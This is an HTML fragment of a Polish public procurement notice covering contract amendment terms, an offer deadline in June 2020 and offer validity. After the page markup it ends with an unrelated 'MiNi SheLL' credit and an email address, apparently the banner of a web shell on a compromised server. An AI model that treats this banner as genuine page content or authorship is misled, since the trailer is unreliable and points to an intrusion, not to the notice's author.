id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">§ 101.	Zakazuje się istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego.2.	Zmiany umowy wymagają pisemnej formy w postaci aneksu podpisanego przez Strony pod rygorem nieważności. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-06-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com